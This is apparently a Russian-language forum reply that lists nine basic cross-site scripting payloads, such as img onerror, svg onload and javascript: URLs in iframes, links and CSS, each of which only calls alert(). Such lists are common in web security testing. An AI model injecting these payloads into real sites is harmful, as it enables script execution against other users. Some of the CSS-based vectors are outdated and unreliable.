Вадим Дюкарев
Ученик
(143)
1 месяц назад
плохо искал:
Вариант с использованием картинки <img src="x" onerror="alert('XSS')">
Использование атрибута события для кнопки <button onclick="alert('XSS')">Click me</button>
Использование атрибута onload в теге <body> -> <body onload="alert('XSS')">
Внедрение с помощью <iframe> -> <iframe src="javascript:alert('XSS');"></iframe>
Внедрение с использованием <input> -> <input type="text" value="XSS" onfocus="alert('XSS')">
Вариант с использованием SVG <svg onload="alert('XSS')"></svg>
Использование CSS для вызова JavaScript <style>@import 'javascript:alert(1)';</style>
XSS через ссылку <a href="javascript:alert('XSS')">Click me</a>
Атака через атрибут style: <div style="background-image: url('javascript:alert(1)')">
надеюсь нашёл для тебя то что надо.